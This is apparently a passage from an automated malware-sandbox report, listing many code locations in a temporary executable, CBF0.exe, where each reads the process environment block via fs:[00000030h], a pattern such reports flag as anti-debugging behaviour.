                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60131B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D4320 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C53CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C53CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5423F6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F23E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F23E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F23E3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B541BE9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56DBE9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544B94 mov edi, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601BA8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5EEB8A mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618BB6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B619BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FD380 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60138A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618A62 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D4257 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542240 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542240 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D4248 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58927A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FB260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FB260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545210 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B563A1C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B558A0A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544A20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544A20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CEA20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B572ACB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543ACA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B572AE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618ADD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5712BD mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B541AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60E962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618966 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543138 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6189E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5431E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D41E8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574190 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B572990 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54519E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54519E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57A185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56C182 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60A189 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60A189 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B547055 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B602073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B611074 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56F86D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B558800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574020 mov edi, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5458EC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5890AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618F6A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54A745 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DF4C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56F716 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C707 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h]
